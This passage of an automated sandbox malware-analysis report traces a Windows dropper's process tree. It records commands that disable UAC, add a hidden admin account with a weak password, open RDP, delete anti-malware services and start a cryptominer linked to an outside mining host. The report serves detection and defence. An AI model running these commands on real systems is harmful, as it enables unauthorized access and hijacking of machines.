    PID 3268 wrote to memory of 2003268cmd.exetimeout.exe
    PID 3268 wrote to memory of 2003268cmd.exetimeout.exe
    PID 3268 wrote to memory of 2003268cmd.exetimeout.exe
    PID 3268 wrote to memory of 21563268cmd.exerutserv.exe
    PID 3268 wrote to memory of 21563268cmd.exerutserv.exe
    PID 3268 wrote to memory of 21563268cmd.exerutserv.exe
    PID 3268 wrote to memory of 20923268cmd.exerutserv.exe
    PID 3268 wrote to memory of 20923268cmd.exerutserv.exe
    PID 3268 wrote to memory of 20923268cmd.exerutserv.exe
    PID 1316 wrote to memory of 39761316LtHv0O2KZDK4M637.exesys.exe
    PID 1316 wrote to memory of 39761316LtHv0O2KZDK4M637.exesys.exe
    PID 1316 wrote to memory of 39761316LtHv0O2KZDK4M637.exesys.exe
    PID 3268 wrote to memory of 40803268cmd.exerutserv.exe
    PID 3268 wrote to memory of 40803268cmd.exerutserv.exe
    PID 3268 wrote to memory of 40803268cmd.exerutserv.exe
    PID 360 wrote to memory of 728360rutserv.exerfusclient.exe
    PID 360 wrote to memory of 2412360rutserv.exerfusclient.exe
    PID 360 wrote to memory of 728360rutserv.exerfusclient.exe
    PID 360 wrote to memory of 2412360rutserv.exerfusclient.exe
    PID 360 wrote to memory of 728360rutserv.exerfusclient.exe
    PID 360 wrote to memory of 2412360rutserv.exerfusclient.exe
    PID 3268 wrote to memory of 39563268cmd.exeattrib.exe
    PID 3268 wrote to memory of 39563268cmd.exeattrib.exe
    PID 3268 wrote to memory of 39563268cmd.exeattrib.exe
    PID 3268 wrote to memory of 9883268cmd.exeattrib.exe
    PID 3268 wrote to memory of 9883268cmd.exeattrib.exe
    PID 3268 wrote to memory of 9883268cmd.exeattrib.exe
    PID 3268 wrote to memory of 11443268cmd.exesc.exe
    PID 3268 wrote to memory of 11443268cmd.exesc.exe
    PID 3268 wrote to memory of 11443268cmd.exesc.exe
    PID 3268 wrote to memory of 22843268cmd.exesc.exe
    PID 3268 wrote to memory of 22843268cmd.exesc.exe
    PID 3268 wrote to memory of 22843268cmd.exesc.exe
    PID 4032 wrote to memory of 9764032winit.exeWinMail.exe
    PID 4032 wrote to memory of 9764032winit.exeWinMail.exe
    PID 4032 wrote to memory of 9764032winit.exeWinMail.exe
    PID 3268 wrote to memory of 29683268cmd.exesc.exe
    PID 3268 wrote to memory of 29683268cmd.exesc.exe
    PID 3268 wrote to memory of 29683268cmd.exesc.exe
    PID 976 wrote to memory of 556976WinMail.exeWinMail.exe
    PID 976 wrote to memory of 556976WinMail.exeWinMail.exe
    PID 3976 wrote to memory of 25203976sys.execmd.exe
    PID 3976 wrote to memory of 25203976sys.execmd.exe
    PID 3976 wrote to memory of 25203976sys.execmd.exe
    PID 2520 wrote to memory of 23282520cmd.exetimeout.exe
    PID 2520 wrote to memory of 23282520cmd.exetimeout.exe
  • System policy modification
    LtHv0O2KZDK4M637.exe

    Tags

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemLtHv0O2KZDK4M637.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"LtHv0O2KZDK4M637.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"LtHv0O2KZDK4M637.exe
  • Views/modifies file attributes
    attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

    Tags

    TTPs

    Hidden Files and Directories

    Reported IOCs

    pidprocess
    4196attrib.exe
    5880attrib.exe
    1796attrib.exe
    6064attrib.exe
    5080attrib.exe
    6068attrib.exe
    6044attrib.exe
    5428attrib.exe
    5652attrib.exe
    5108attrib.exe
    5916attrib.exe
    2896attrib.exe
    6032attrib.exe
    5472attrib.exe
    5092attrib.exe
    2500attrib.exe
    5744attrib.exe
    5272attrib.exe
    988attrib.exe
    5432attrib.exe
    5792attrib.exe
    5892attrib.exe
    5696attrib.exe
    5588attrib.exe
    1132attrib.exe
    4560attrib.exe
    1640attrib.exe
    6008attrib.exe
    3956attrib.exe
    4712attrib.exe
    5188attrib.exe
Processes 504
  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1316
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:3268
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Modifies WinLogon
            Runs .reg file with regedit
            PID:1140
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:2576
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:200
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:2156
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:2092
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:4080
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:3956
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:988
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:1144
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:2284
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:2968
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:976
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:4084
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:4088
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:2328
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:640
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:3096
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:1912
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:4248
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:4296
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:4348
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:4124
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:2004
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4396
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4512
          • C:\ProgramData\WindowsTask\audiodg.exe
            C:\ProgramData\WindowsTask\audiodg.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:5304
          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
            C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:3500
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:352
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:3964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:2056
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            PID:3400
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:4236
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:4388
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:4456
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4504
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4544
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:4576
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:4748
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:4792
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4840
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4936
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4380
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:4516
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:4688
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:4772
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:4804
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:4964
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:1360
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:4992
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:2064
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:1960
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:3892
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:5036
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:3396
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:3816
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:1524
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4048
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:2004
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:992
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:4376
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4312
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:940
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4472
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:4452
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4580
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:4768
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:4764
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    PID:4888
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:556
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:2544
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    Modifies WinLogon
                    PID:4264
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:2844
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:4480
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5092
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:5080
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:4196
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4288
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:4652
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:4696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:4716
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:4780
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:4860
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:4916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:4956
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:5000
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:5020
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:5104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:5032
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:3172
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:4100
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:3296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:4140
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:4228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:4324
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:4552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:4808
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:4824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:4876
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:4912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:3860
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:5060
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:2508
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4428
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:4208
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4816
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:4864
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:4728
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:3176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:4968
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:5056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4116
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:1124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:968
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:3596
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:1384
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:4284
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:4812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:4852
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4368
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:4476
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:3600
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:5068
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:2860
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4272
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4372
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4488
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4884
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:3952
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4064
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:4268
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:4528
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4572
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:4776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:4920
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:4460
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4900
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:4108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:5052
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:1420
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:4960
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:4492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:4740
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:5004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:4252
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:4508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:3924
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4660
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:2564
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:5116
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:4868
        • C:\Windows\SysWOW64\cmd.exe
